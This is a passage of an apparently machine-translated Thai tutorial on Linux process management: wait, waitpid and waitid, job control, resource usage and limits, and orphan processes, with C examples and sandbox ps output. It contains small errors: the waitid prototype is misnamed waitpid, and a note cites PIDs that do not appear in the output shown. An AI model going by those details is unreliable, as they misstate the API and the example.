4688328   85789      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86368      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86402      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   87027      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
7528790   87629      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
7528790   87719      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
4688328   88138      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   88140      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   89353      0 99 Jan22 ?        2-07:35:24 /sbin/klogd -c 1 -x -x
5942779   91836      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328  125358      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  125359      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328  127456      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  127457      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
8023807  164138      0  0 05:41 ?        00:00:00 main
8023807  164897 164138  0 05:41 ?        00:00:00 ps -ef

Note - สังเกตว่า PID ของกระบวนการพาเรนต์คือ 94 และ PID ของโปรเซสลูกคือ 95 หลังจากกระบวนการพาเรนต์ออกไป PPID ของโปรเซสลูกเปลี่ยนจาก 94 เป็น 1 (init process)

ต่อไปนี้เป็นตัวแปรของการเรียกระบบเพื่อตรวจสอบกระบวนการลูก / es -

  • wait()
  • waitpid()
  • waitid()

wait() การเรียกระบบจะรอให้เด็กคนใดคนหนึ่งยุติและคืนสถานะการสิ้นสุดในบัฟเฟอร์ตามที่อธิบายไว้ด้านล่าง

#include <sys/types.h>
#include <sys/wait.h>

pid_t wait(int *status);

การเรียกนี้ส่งคืน ID กระบวนการของชายด์ที่ถูกยกเลิกเมื่อสำเร็จและ -1 เมื่อล้มเหลว การเรียกใช้ระบบ wait () จะระงับการดำเนินการของกระบวนการปัจจุบันและรออย่างไม่มีกำหนดจนกว่าหนึ่งในลูกของมันจะสิ้นสุดลง สถานะการเลิกจ้างจากเด็กมีอยู่ในสถานะ

ให้เราแก้ไขโปรแกรมก่อนหน้านี้เพื่อให้กระบวนการพาเรนต์รอกระบวนการย่อย

/ * ชื่อไฟล์: parentprocess_waits.c * /

#include<stdio.h>

int main() {
   int pid;
   int status;
   pid = fork();
   
   // Child process
   if (pid == 0) {
      system("ps -ef");
      sleep(10);
      system("ps -ef");
      return 3; //exit status is 3 from child process
   } else {
      sleep(3);
      wait(&status);
      printf("In parent process: exit status from child is decimal %d, hexa %0x\n", status, status);
   }
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan20 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql       101      1  0 Jan20 ?        00:04:42 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mariadb/mariadb.log --pid-file=/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
3108506    5445      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328    5446      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   21894      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   21895      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   27309      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   27311      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
8295652   32407      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
4688328   49830      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
3108506   50854      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
4688328   64936      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
3108506   64937      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   67563      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
5942779   68128      0  0 Jan22 ?        00:00:07 /sbin/klogd -c 1 -x -x
3108506   68238      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   68999      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
3108506   69212      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   74090      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   74091      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328   74298      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   74299      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
6327201   74901      0  0 Jan20 ?        00:00:38 /sbin/klogd -c 1 -x -x
6327201   77274      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   78621      0  0 Jan20 ?        00:00:33 /sbin/klogd -c 1 -x -x
7528790   80536      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
6327201   80542      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
4688328   82050      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
3108506   82051      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
7528790   84116      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   84136      0 19 Jan20 ?        21:19:39 /sbin/klogd -c 1 -x -x
7528790   84140      0  0 Jan20 ?        00:00:28 /sbin/klogd -c 1 -x -x
3108506   84395      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84396      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84397      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
3108506   84928      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84929      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84930      0  0 Jan22 ?        00:00:30 [/sbin/klogd -c ] <defunct>
7528790   84970      0  0 Jan20 ?        00:00:34 /sbin/klogd -c 1 -x -x
3108506   85787      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   85789      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86368      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86402      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   87027      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
7528790   87629      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
7528790   87719      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
4688328   88138      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   88140      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   89353      0 99 Jan22 ?        2-07:41:15 /sbin/klogd -c 1 -x -x
5942779   91836      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328  125358      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  125359      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328  127456      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  127457      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
8023807  191762      0  0 05:47 ?        00:00:00 sh -c cd /home/cg/root/8023807; timeout 10s main
8023807  191768 191762  0 05:47 ?        00:00:00 timeout 10s main
8023807  191769 191768  0 05:47 ?        00:00:00 main
8023807  191770 191769  0 05:47 ?        00:00:00 main
8023807  192193      0  0 05:47 ?        00:00:00 sh -c cd /home/cg/root/8023807; timeout 10s main
8023807  192199 192193  0 05:47 ?        00:00:00 timeout 10s main
8023807  192200 192199  0 05:47 ?        00:00:00 main
8023807  192201 192200  0 05:47 ?        00:00:00 main
8023807  192202 192201  0 05:47 ?        00:00:00 ps -ef

Note- แม้ว่าลูกจะส่งคืนสถานะการออกเป็น 3 แต่เหตุใดกระบวนการหลักจึงเห็นว่าเป็น 768 สถานะจะถูกเก็บไว้ในไบต์ลำดับที่สูงกว่าดังนั้นจึงถูกจัดเก็บในรูปแบบเลขฐานสิบหกเป็น 0X0300 ซึ่งเท่ากับ 768 ในทศนิยม การเลิกจ้างตามปกติมีดังนี้

ไบต์ลำดับที่สูงขึ้น (บิต 8 ถึง 15) ไบต์ลำดับที่ต่ำกว่า (Bits 0 ถึง 7)
สถานะการออก (0 ถึง 255) 0

การเรียกระบบ wait () มีข้อ จำกัด เช่นสามารถรอจนกว่าจะออกของลูกคนถัดไป หากเราต้องการรอเด็กที่เฉพาะเจาะจงไม่สามารถทำได้โดยใช้ wait () อย่างไรก็ตามเป็นไปได้โดยใช้การเรียกระบบ waitpid ()

การเรียกระบบ waitpid () จะรอให้เด็กที่ระบุยุติและคืนสถานะการสิ้นสุดในบัฟเฟอร์ตามที่อธิบายไว้ด้านล่าง

#include <sys/types.h>
#include <sys/wait.h>

pid_t waitpid(pid_t pid, int *status, int options);

การเรียกใช้ข้างต้นส่งคืน ID กระบวนการของเด็กที่ถูกยุติเมื่อสำเร็จและ -1 เมื่อล้มเหลว การเรียกระบบ waitpid () ระงับการดำเนินการของกระบวนการปัจจุบันและรออย่างไม่มีกำหนดจนกว่าชายด์ที่ระบุ (ตามค่า pid) จะสิ้นสุดลง สถานะการเลิกจ้างจากเด็กมีอยู่ในสถานะ

ค่าของ pid อาจเป็นอย่างใดอย่างหนึ่งต่อไปนี้ -

  • < -1 - รอกระบวนการย่อยที่ ID กลุ่มกระบวนการเท่ากับค่าสัมบูรณ์ของ pid

  • -1 - รอกระบวนการย่อยใด ๆ ซึ่งเท่ากับการเรียกของระบบ wait ()

  • 0 - รอกระบวนการย่อยใด ๆ ที่มี ID กลุ่มกระบวนการเท่ากับกระบวนการเรียก

  • >0 - รอกระบวนการย่อยที่ ID กระบวนการเท่ากับค่าของ pid

ตามค่าเริ่มต้นการเรียกระบบ waitpid () จะรอเฉพาะสำหรับเด็กที่ถูกยกเลิก แต่พฤติกรรมเริ่มต้นนี้สามารถแก้ไขได้โดยใช้อาร์กิวเมนต์ตัวเลือก

ตอนนี้ให้เราพิจารณาโปรแกรมเป็นตัวอย่างรอกระบวนการเฉพาะที่มีรหัสกระบวนการ

/ * ชื่อไฟล์: waitpid_test.c * /

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/wait.h>

int main() {
   int pid;
   int pids[3];
   int status;
   int numprocesses = 0;
   int total_processes = 3;
   while (numprocesses < total_processes) {
      pid = fork();
      
      // Child process
      if (pid == 0) {
         printf("In child process: process id is %d\n", getpid());
         sleep(5);
         return 4;
      } else {
         pids[numprocesses] = pid;
         numprocesses++;
         printf("In parent process: created process number: %d\n", pid);
      }
   }
   
   // Waiting for 3rd child process
   waitpid(pids[total_processes - 1], &status, 0);
   if (WIFEXITED(status) != 0) {
      printf("process %d exited normally\n", pids[total_processes - 1]);
      printf("exit status from child is %d\n", WEXITSTATUS(status));
   } else {
      printf("process %d not exited normally\n", pids[total_processes - 1]);
   }
   return 0;
}

หลังจากคอมไพล์และดำเนินการแล้วผลลัพธ์ต่อไปนี้คือผลลัพธ์

In child process: process id is 32528
In parent process: created process number: 32528
In child process: process id is 32529
In parent process: created process number: 32528
In parent process: created process number: 32529
In child process: process id is 32530
In parent process: created process number: 32528
In parent process: created process number: 32529
In parent process: created process number: 32530
process 32530 exited normally
exit status from child is 4

ตอนนี้ให้เราตรวจสอบการโทรของระบบ waitid () การเรียกระบบนี้รอให้กระบวนการลูกเปลี่ยนสถานะ

#include <sys/wait.h>

int waitpid(idtype_t idtype, id_t id, siginfo_t *infop, int options);

การเรียกระบบข้างต้นจะรอให้กระบวนการลูกเปลี่ยนสถานะและการโทรนี้จะระงับกระบวนการปัจจุบัน / การโทรจนกว่ากระบวนการลูกใด ๆ จะเปลี่ยนสถานะ อาร์กิวเมนต์ 'infop' คือการบันทึกสถานะปัจจุบันของเด็ก การโทรนี้จะส่งคืนทันทีหากกระบวนการได้เปลี่ยนสถานะแล้ว

ค่าของ idtype สามารถเป็นอย่างใดอย่างหนึ่งต่อไปนี้ -

  • P_PID - รอกระบวนการย่อยที่ ID กระบวนการเท่ากับ id

  • P_PGID - รอสำหรับกระบวนการย่อยใด ๆ ซึ่ง ID กลุ่มกระบวนการจะเท่ากับ ID

  • P_ALL - รอให้กระบวนการย่อยและ id ถูกละเว้น

  • อาร์กิวเมนต์อ็อพชันคือการระบุสถานะที่เปลี่ยนแปลงและสามารถเกิดขึ้นได้ด้วยการดำเนินการแบบบิตหรือด้วยแฟล็กที่กล่าวถึงด้านล่าง -

  • WCONTINUED - ส่งคืนสถานะของเด็กที่ถูกหยุดและได้รับการดำเนินการต่อ

  • WEXITED - รอให้กระบวนการออก

  • WNOHANG - ส่งคืนทันที

  • WSTOPPED - รอกระบวนการของเด็กที่หยุดลงเมื่อได้รับสัญญาณและส่งคืนสถานะ

การเรียกนี้จะคืนค่า 0 หากส่งคืนเนื่องจากการเปลี่ยนแปลงสถานะของหนึ่งในลูกของมันและใช้ WNOHANG จะส่งกลับ –1 ในกรณีที่เกิดข้อผิดพลาดและตั้งค่าหมายเลขข้อผิดพลาดที่เหมาะสม

/ * ชื่อไฟล์: waitid_test.c * /

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/wait.h>

int main() {
   int pid;
   int pids[3];
   int status;
   int numprocesses = 0;
   int total_processes = 3;
   siginfo_t siginfo;
   while (numprocesses < total_processes) {
      pid = fork();
      
      // Child process
      if (pid == 0) {
         printf("In child process: process id is %d\n", getpid());
         sleep(5);
         return 2;
      } else {
         pids[numprocesses] = pid;
         numprocesses++;
         printf("In parent process: created process number: %d\n", pid);
      }
   }
   
   // Waiting for 3rd child process
   status = waitid(P_PID, pids[total_processes - 1], &siginfo, WEXITED);
   if (status == -1) {
      perror("waitid error");
      return 1;
   }
   printf("Info received from waitid is: ");
   printf("PID of child: %d, real user id of child: %d\n", siginfo.si_pid, siginfo.si_uid);
   return 0;
}

หลังจากดำเนินการและรวบรวมโปรแกรมข้างต้นแล้วผลลัพธ์ต่อไปนี้คือ

In child process: process id is 35390
In parent process: created process number: 35390
In child process: process id is 35391
In parent process: created process number: 35390
In parent process: created process number: 35391
In child process: process id is 35392
In parent process: created process number: 35390
In parent process: created process number: 35391
In parent process: created process number: 35392
Info received from waitid is: PID of child: 35392, real user id of child: 4581875

ในบทนี้เราจะทำความคุ้นเคยกับกลุ่มกระบวนการเซสชันและการควบคุมงาน

Process Group- กลุ่มกระบวนการคือกลุ่มของกระบวนการหนึ่งหรือหลายกระบวนการ กลุ่มกระบวนการประกอบด้วยกระบวนการอย่างน้อยหนึ่งกระบวนการที่ใช้ตัวระบุกลุ่มกระบวนการเดียวกัน (PGID) ID กลุ่มกระบวนการ (PGID) เป็นประเภทเดียวกัน (pid_t) กับ ID กระบวนการ กลุ่มกระบวนการมีหัวหน้ากลุ่มกระบวนการซึ่งเป็นกระบวนการที่สร้างกลุ่มและ ID กระบวนการของใครจะกลายเป็น ID กลุ่มกระบวนการของกลุ่ม

Sessions - เป็นการรวบรวมกลุ่มกระบวนการต่างๆ

Job Control- อนุญาตให้ผู้ใช้เชลล์รันคำสั่ง (หรืองาน) หลายคำสั่งพร้อมกันโดยคำสั่งหนึ่งอยู่เบื้องหน้าและทั้งหมดที่เหลืออยู่ในพื้นหลัง นอกจากนี้ยังสามารถย้ายงานจากเบื้องหน้าไปยังพื้นหลังและในทางกลับกันได้

ให้เราเข้าใจสิ่งนี้ด้วยความช่วยเหลือของโปรแกรมตัวอย่างโดยใช้เชลล์ (BASH)

  • เชลล์สคริปต์ (ใน BASH) เพื่อดำเนินการคำสั่งพื้นฐาน (วันที่, เสียงสะท้อน, สลีปและแคล) ที่ชื่อ basic_commands.sh

  • เชลล์สคริปต์ (ใน BASH) เพื่อดำเนินการคำสั่งพื้นฐาน (ps, echo)

#!/bin/bash
#basic_commands.sh

date
echo "Now sleeping for 250 seconds, so that testing job control functionality is smooth"
sleep 250
cal

#!/bin/bash
#process_status.sh

ps
echo "Now sleeping for 200 seconds, so that testing job control functionality is smooth"
sleep 200
ps

ใช้คำสั่ง chmod เพื่อให้ไฟล์มีสิทธิ์ดำเนินการ ตามค่าเริ่มต้นไฟล์ปกติจะได้รับสิทธิ์ในการอ่านและเขียนเท่านั้นและไม่ดำเนินการอนุญาต

หากต้องการหยุดกระบวนการทำงานปัจจุบันคุณต้องป้อน CTRL + Z ซึ่งจะให้หมายเลขงานแก่คุณ งานสามารถกลับมาทำงานต่อได้ทั้งในเบื้องหน้าหรือเบื้องหลัง หากจำเป็นในการดำเนินงานต่อในเบื้องหน้าให้ใช้คำสั่ง 'fg' หากจำเป็นในการทำงานต่อในพื้นหลังให้ใช้คำสั่ง 'bg' เมื่อใช้สิ่งนี้จะเรียกใช้เฉพาะกระบวนการที่หยุดล่าสุดเท่านั้น จะเกิดอะไรขึ้นหากคุณต้องการเริ่มต้นอื่นนอกเหนือจากกระบวนการที่หยุดล่าสุด เพียงใช้หมายเลขงานหลัง fg หรือ bg (เช่น bg% 2 หรือ bg% 3 เป็นต้น) หากงานที่กำลังทำงานอยู่อยู่เบื้องหลังคุณสามารถเรียกใช้งานอื่น ๆ ในเบื้องหน้าได้ ในการรับรายชื่องานให้ใช้คำสั่งงาน นอกจากนี้ยังสามารถยุติกระบวนการได้ด้วย CTRL + C หรือคำสั่ง kill คุณสามารถส่งหมายเลขงานได้ในขณะที่ใช้คำสั่ง kill

ตรวจสอบผลลัพธ์ต่อไปนี้ซึ่งแสดงให้เห็นถึงการหยุดงานการย้ายงานจากพื้นหน้าไปยังพื้นหลังและในทางกลับกันการยุติงาน ฯลฯ

chmod u+x basic_commands.sh
chmod u+x process_status.sh

./basic_commands.sh
Wed Jul 5 18:30:27 IST 2017
Now sleeping for 250 seconds, so that testing job control functionality is smooth
^Z
[1]+ Stopped ./basic_commands.sh
./process_status.sh
PID   TTY   TIME     CMD
2295  pts/1 00:00:00 bash
4222  pts/1 00:00:00 basic_commands.
4224  pts/1 00:00:00 sleep
4225  pts/1 00:00:00 process_status.
4226  pts/1 00:00:00 ps
Now sleeping for 200 seconds, so that testing job control functionality is smooth
^Z
[2]+ Stopped      ./process_status.sh
jobs
[1]- Stopped      ./basic_commands.sh
[2]+ Stopped      ./process_status.sh
fg
./process_status.sh
^Z
[2]+ Stopped      ./process_status.sh
fg %2
./process_status.sh
^Z
[2]+ Stopped      ./process_status.sh
fg %1
./basic_commands.sh
^Z
[1]+ Stopped      ./basic_commands.sh

jobs
[1]+ Stopped      ./basic_commands.sh
[2]- Stopped      ./process_status.sh

bg %2
[2]- ./process_status.sh &
fg
./basic_commands.sh
^Z
[1]+ Stopped      ./basic_commands.sh
jobs
[1]+ Stopped      ./basic_commands.sh
[2]- Running      ./process_status.sh &
fg %2
./process_status.sh
^Z
[2]+ Stopped      ./process_status.sh
jobs
[1]- Stopped      ./basic_commands.sh
[2]+ Stopped      ./process_status.sh
kill %1 %2
[1]- Stopped      ./basic_commands.sh
[2]+ Stopped      ./process_status.sh

[1]- Terminated   ./basic_commands.sh
[2]+ Terminated   ./process_status.sh

กระบวนการต้องการทรัพยากรบางอย่างเช่น CPU และหน่วยความจำเพื่อดำเนินการ ตอนนี้เราจะดูคำสั่งที่เกี่ยวข้องและการเรียกระบบเพื่อทราบข้อมูลเกี่ยวกับการใช้ทรัพยากรและการตรวจสอบ นอกจากนี้ยังมีข้อ จำกัด บางประการตามค่าเริ่มต้นสำหรับแต่ละกระบวนการบนทรัพยากรและหากต้องการขีด จำกัด สามารถปรับปรุงเพื่อรองรับความต้องการของแอปพลิเคชัน

ต่อไปนี้เป็นข้อมูลระบบหรือทรัพยากรกระบวนการที่จำเป็นโดยใช้คำสั่ง -

คำสั่งด้านบน

$ top

คำสั่งด้านบนแสดงการใช้ทรัพยากรระบบอย่างต่อเนื่อง หากกระบวนการใดทำให้ระบบอยู่ในสถานะแฮงค์ (ใช้ CPU หรือหน่วยความจำมากขึ้น) คุณสามารถจดบันทึกข้อมูลกระบวนการและดำเนินการตามความเหมาะสม (เช่นการฆ่ากระบวนการที่เกี่ยวข้อง)

คำสั่ง ps

$ ps

คำสั่ง ps ให้ข้อมูลเกี่ยวกับกระบวนการที่รันอยู่ทั้งหมด ซึ่งจะช่วยในการตรวจสอบและควบคุมกระบวนการต่างๆ

คำสั่ง vmstat

$ vmstat

คำสั่ง vmstat รายงานสถิติของระบบย่อยหน่วยความจำเสมือน รายงานข้อมูลของกระบวนการ (รอรัน, สลีป, กระบวนการที่รันได้ ฯลฯ ), หน่วยความจำ (ข้อมูลหน่วยความจำเสมือนเช่นว่าง, ใช้แล้ว ฯลฯ ), พื้นที่สว็อป, อุปกรณ์ IO, ข้อมูลระบบ (จำนวนอินเทอร์รัปต์, สวิทช์บริบท ) และ CPU (ผู้ใช้ระบบและเวลาว่าง)

คำสั่ง lsof

$ lsof

คำสั่ง lsof พิมพ์รายการไฟล์ที่เปิดอยู่ของกระบวนการที่กำลังทำงานอยู่ทั้งหมดรวมถึงกระบวนการของระบบ

คำสั่ง getconf

$ getconf –a

คำสั่ง getconf แสดงข้อมูลตัวแปรคอนฟิกูเรชันระบบ

ตอนนี้ให้เราดูการเรียกระบบที่เกี่ยวข้อง

  • เรียกระบบ getrusage () ซึ่งให้ข้อมูลเกี่ยวกับการใช้ทรัพยากรระบบ

  • การเรียกระบบที่เกี่ยวข้องกับการเข้าถึงและการตั้งค่าขีด จำกัด ทรัพยากร ได้แก่ getrlimit (), setrlimit (), prlimit ()

การเรียกใช้ทรัพยากรระบบ

#include <sys/time.h>
#include <sys/resource.h>

int getrusage(int who, struct rusage *usage);

การเรียกระบบ getrusage () ส่งคืนข้อมูลเกี่ยวกับการใช้ทรัพยากรระบบ ซึ่งอาจรวมถึงข้อมูลเกี่ยวกับตนเองเด็กหรือการเรียกเธรดโดยใช้แฟล็ก RUSAGE_SELF, RUSAGE_CHILDREN, RUSAGE_THREAD สำหรับตัวแปร "who" หลังจากการโทรระบบจะส่งคืนข้อมูลในโครงสร้าง rusage

การโทรนี้จะส่งคืน“ 0” เมื่อสำเร็จและ“ -1” เมื่อล้มเหลว

ให้เราดูตัวอย่างโปรแกรมต่อไปนี้

/ * ชื่อไฟล์: sysinfo_getrusage.c * /

#include<stdio.h>
#include<sys/time.h>
#include<sys/resource.h>

void main(void) {
   struct rusage res_usage;
   int retval;
   retval = getrusage(RUSAGE_SELF, &res_usage);
   if (retval == -1) {
      perror("getrusage error");
      return;
   }
   printf("Details of getrusage:\n");
   printf("User CPU time (seconds) is %d\n", (int)res_usage.ru_utime.tv_sec);
   printf("User CPU time (micro seconds) is %d\n", (int)res_usage.ru_utime.tv_usec);
   printf("Maximum size of resident set (kb) is %ld\n", res_usage.ru_maxrss);
   printf("Soft page faults (I/O not required) is %ld\n", res_usage.ru_minflt);
   printf("Hard page faults (I/O not required) is %ld\n", res_usage.ru_majflt);
   printf("Block input operations via file system is %ld\n", res_usage.ru_inblock);
   printf("Block output operations via file system is %ld\n", res_usage.ru_oublock);
   printf("Voluntary context switches are %ld\n", res_usage.ru_nvcsw);
   printf("Involuntary context switches are %ld\n", res_usage.ru_nivcsw);
   return;
}

ขั้นตอนการรวบรวมและดำเนินการ

Details of getrusage:
User CPU time (seconds) is 0
User CPU time (micro seconds) is 0
Maximum size of resident set (kb) is 364
Soft page faults (I/O not required) is 137
Hard page faults (I/O not required) is 0
Block input operations via file system is 0
Block output operations via file system is 0
Voluntary context switches are 0
Involuntary context switches are 1

ตอนนี้ให้เราดูการเรียกระบบที่เกี่ยวข้องกับการเข้าถึงและการตั้งค่าขีด จำกัด ทรัพยากร

#include <sys/time.h>
#include <sys/resource.h>

int getrlimit(int resource, struct rlimit *rlim);
int setrlimit(int resource, const struct rlimit *rlim);
int prlimit(pid_t pid, int resource, const struct rlimit *new_limit, struct rlimit *old_limit);

ระบบโทร getrlimit() ได้รับขีด จำกัด ทรัพยากรในโครงสร้าง rlimit โดยการป้อนทรัพยากรที่ต้องการเช่น RLIMIT_NOFILE, RLIMIT_NPROC, RLIMIT_STACK เป็นต้น

ระบบโทร setrlimit() ตั้งค่าขีด จำกัด ทรัพยากรตามที่กล่าวไว้ในโครงสร้าง rlimit เท่าที่อยู่ในขอบเขต

ระบบโทร prlimit() ถูกใช้เพื่อวัตถุประสงค์ที่แตกต่างกันเช่นเพื่อดึงขีด จำกัด ทรัพยากรปัจจุบันหรือสำหรับการอัปเดตขีด จำกัด ทรัพยากรเป็นค่าใหม่

โครงสร้าง rlimit มีสองค่า -

  • Soft limit - ขีด จำกัด ปัจจุบัน

  • Hard limit - ขีด จำกัด สูงสุดที่สามารถขยายได้

RLIMIT_NOFILE

RLIMIT_NPROC - จำนวนกระบวนการสูงสุดที่สามารถสร้างขึ้นสำหรับผู้ใช้ของกระบวนการนั้น

RLIMIT_STACK - ขนาดสูงสุดเป็นไบต์ของส่วนสแต็กสำหรับกระบวนการนั้น

การเรียกทั้งหมดนี้จะส่งกลับ "0" เมื่อสำเร็จและ "-1" เมื่อล้มเหลว

ให้เราพิจารณาตัวอย่างต่อไปนี้ที่เราใช้การเรียกระบบ getrlimit ()

/ * ชื่อไฟล์: sysinfo_getrlimit.c * /

#include<stdio.h>
#include<sys/time.h>
#include<sys/resource.h>

void main(void) {
   struct rlimit res_limit;
   int retval;
   int resources[] = {RLIMIT_NOFILE, RLIMIT_NPROC, RLIMIT_STACK};
   int max_res;
   int counter = 0;
   printf("Details of resource limits for NOFILE, NPROC, STACK are as follows: \n");
   max_res = sizeof(resources)/sizeof(int);
   while (counter < max_res) {
      retval = getrlimit(resources[counter], &res_limit);
      if (retval == -1) {
         perror("getrlimit error");
         return;
      }
      printf("Soft Limit is %ld\n", res_limit.rlim_cur);
      printf("Hard Limit (ceiling) is %ld\n", res_limit.rlim_max);
      counter++;
   }
   return;
}

ขั้นตอนการรวบรวมและดำเนินการ

Details of resource limits for NOFILE, NPROC, STACK are as follows: 
Soft Limit is 516
Hard Limit (ceiling) is 516
Soft Limit is 256
Hard Limit (ceiling) is 256
Soft Limit is 33554432
Hard Limit (ceiling) is 33554432

ให้เราพิจารณาอีกตัวอย่างหนึ่งด้วยการเรียกระบบ getrlimit () แต่ตอนนี้มีการเรียกระบบ prlimit ()

/ * ชื่อไฟล์: sysinfo_prlimit.c * /

#include<stdio.h>
#include<unistd.h>
#include<sys/time.h>
#include<sys/resource.h>

void main(void) {
   struct rlimit res_limit;
   int retval;
   int resources[] = {RLIMIT_NOFILE, RLIMIT_NPROC, RLIMIT_STACK};
   int max_res;
   int counter = 0;
   printf("Details of resource limits for NOFILE, NPROC, STACK using prlimit are as follows: \n");
   max_res = sizeof(resources)/sizeof(int);
   while (counter < max_res) {
      retval = prlimit(getpid(), resources[counter], NULL, &res_limit);
      if (retval == -1) {
         perror("prlimit error");
         return;
      }
      printf("Soft Limit is %ld\n", res_limit.rlim_cur);
      printf("Hard Limit (ceiling) is %ld\n", res_limit.rlim_max);
      counter++;
   }
   return;
}

ขั้นตอนการรวบรวมและดำเนินการ

Details of resource limits for NOFILE, NPROC, STACK using prlimit are as follows: 
Soft Limit is 516
Hard Limit (ceiling) is 516
Soft Limit is 256
Hard Limit (ceiling) is 256
Soft Limit is 33554432
Hard Limit (ceiling) is 33554432

จนถึงตอนนี้เราได้พูดคุยเกี่ยวกับกระบวนการการสร้างกระบวนการแม่และลูก ฯลฯ การสนทนาจะไม่สมบูรณ์หากไม่พูดถึงกระบวนการอื่น ๆ ที่เกี่ยวข้องเช่นกระบวนการเด็กกำพร้ากระบวนการซอมบี้และกระบวนการภูต

กระบวนการเด็กกำพร้า

ตามที่ระบุโดยชื่อเด็กกำพร้าหมายถึงกระบวนการที่ไม่มีผู้ปกครอง เมื่อเรารันโปรแกรมหรือแอ็พพลิเคชันกระบวนการหลักสำหรับแอ็พพลิเคชันคือเชลล์ เมื่อเราสร้างกระบวนการโดยใช้ fork () กระบวนการที่สร้างขึ้นใหม่คือกระบวนการลูกและกระบวนการที่สร้างลูกคือกระบวนการแม่ ในทางกลับกันกระบวนการหลักของสิ่งนี้คือเชลล์ แน่นอนว่าพาเรนต์ของกระบวนการทั้งหมดคือกระบวนการเริ่มต้น (Process ID → 1)

ข้างต้นเป็นสถานการณ์ปกติอย่างไรก็ตามจะเกิดอะไรขึ้นถ้ากระบวนการหลักออกจากกระบวนการย่อยก่อน ผลลัพธ์คือตอนนี้กระบวนการย่อยกลายเป็นกระบวนการเด็กกำพร้า จากนั้นสิ่งที่เกี่ยวกับพาเรนต์พาเรนต์ใหม่คือพาเรนต์ของโปรเซสทั้งหมดซึ่งไม่มีอะไรเลยนอกจากกระบวนการเริ่มต้น (ID กระบวนการ - 1)

ให้เราลองทำความเข้าใจโดยใช้ตัวอย่างต่อไปนี้

/ * ชื่อไฟล์: orphan_process.c * /

#include<stdio.h>
#include<stdlib.h>

int main() {
   int pid;
   system("ps -f");
   pid = fork();
   if (pid == 0) {
      printf("Child: pid is %d and ppid is %d\n",getpid(),getppid());
      sleep(5);
